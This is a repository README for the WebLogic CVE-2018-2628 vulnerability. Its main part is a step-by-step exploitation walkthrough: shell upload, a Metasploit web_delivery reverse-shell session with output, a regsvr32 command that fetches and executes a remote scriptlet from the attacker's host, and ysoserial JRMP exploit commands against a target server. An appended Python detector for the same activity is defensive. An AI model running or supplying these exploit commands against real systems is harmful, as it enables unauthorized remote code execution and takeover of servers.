# CVE-2018-2628-2

**Repository Path**: xdawn/cve-2018-2628-2

- **Default Branch**: master
- **Created**: 2020-10-05
- **Last Updated**: 2020-12-19

## README

## Testing for the vulnerability

![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102010603.png)

## Uploading a shell

Method 1:

![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102010537.png)

Method 2:

![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190107195417.png)

## Executing the shell

![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102010451.png)

## Obtaining a meterpreter session

![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102143024.png)

```
msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
target => 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.129.128
lhost => 192.168.129.128
msf exploit(multi/script/web_delivery) > set lport 2333
lport => 2333
msf exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.129.128:2333
[*] Using URL: http://0.0.0.0:8080/ZqKpshnepenp8T9
msf exploit(multi/script/web_delivery) > [*] Local IP: http://192.168.129.128:8080/ZqKpshnepenp8T9
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://192.168.129.128:8080/ZqKpshnepenp8T9.sct scrobj.dll
[*] 192.168.129.143 web_delivery - Handling .sct Request
[*] 192.168.129.143 web_delivery - Delivering Payload
[*] Sending stage (179779 bytes) to 192.168.129.143
[*] Meterpreter session 1 opened (192.168.129.128:2333 -> 192.168.129.143:52210) at 2019-01-02 01:29:00 -0500

msf exploit(multi/script/web_delivery) > sessions -i 1
```

Run in cmd:

```
regsvr32 /s /n /u /i:http://192.168.129.128:8080/ZqKpshnepenp8T9.sct scrobj.dll
```

![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102143132.png)

**Enter the meterpreter session:**

```bash
sessions -i 1
```

![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102143212.png)

Method 2:

```
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'regsvr32 /s /n /u /i:http://192.168.129.128:8080/cPeSBp.sct scrobj.dll'
python 44553.py 192.168.129.143 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.129.128 1099 JRMPClient

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'regsvr32 /s /n /u /i:http://192.168.129.128:8080/7Gcn5at6tOGgzG.sct scrobj.dll'
python 44553.py 192.168.129.143 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.129.128 1099 JRMPClient
```
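
A defender-side check for the process activity this walkthrough leaves on the WebLogic host, as an added example that is not part of the original repository: it classifies process-creation events for the `regsvr32 /i:<URL> scrobj.dll` command line shown above and for shells started by the server's Java process. The field names (`Image`, `ParentImage`, `CommandLine`) follow Sysmon process-creation events; the sample events, the file paths in them, the severity labels, and the treatment of `-i:` as equivalent to `/i:` are assumptions made for the example.

```python
import re

TOKEN = re.compile(r'"[^"]*"|\S+')                        # keep quoted arguments whole
REMOTE_I = re.compile(r'^[/-]i:"?(?:https?|ftp)://', re.I)  # /i:<URL>; -i: assumed equivalent
SHELLS = {"regsvr32.exe", "cmd.exe", "powershell.exe"}
JAVA = {"java.exe", "javaw.exe"}

def base(path):
    """Lower-cased file name of a Windows path or argument, quotes removed."""
    return re.split(r"[\\/]", path.strip('"'))[-1].lower()

def classify(event):
    """Return (severity, flags) for one process-creation event."""
    args = TOKEN.findall(event["CommandLine"])[1:]         # skip the program name
    image = base(event["Image"])
    is_regsvr32 = image == "regsvr32.exe"
    remote = is_regsvr32 and any(REMOTE_I.match(a) for a in args)
    scrobj = is_regsvr32 and any(base(a) in ("scrobj.dll", "scrobj") for a in args)
    # A command run inside the application server shows up as a child of its JVM.
    java_child = base(event["ParentImage"]) in JAVA and image in SHELLS
    if remote and scrobj:
        severity = "high"        # remote scriptlet executed through scrobj.dll
    elif remote or java_child:
        severity = "medium"      # suspicious on its own, needs triage
    else:
        severity = "none"
    return severity, {"remote_scriptlet": remote and scrobj, "java_child": java_child}

# Constructed events; only the regsvr32 command line and IPs come from the README.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Oracle\Middleware\jdk\bin\java.exe",
     "CommandLine": "regsvr32 /s /n /u /i:http://192.168.129.128:8080/ZqKpshnepenp8T9.sct scrobj.dll"},
    {"Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'REGSVR32.EXE -s -n -u -i:"http://192.168.129.128:8080/ZqKpshnepenp8T9.sct" scrobj.dll'},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"regsvr32 /s C:\Windows\System32\msxml3.dll"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Oracle\Middleware\jdk\bin\java.exe",
     "CommandLine": "cmd.exe /c ver"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev)[0], "|", ev["CommandLine"])
```

The `java_child` flag matters on its own: it still fires when the command delivered through the Java process is something other than `regsvr32`.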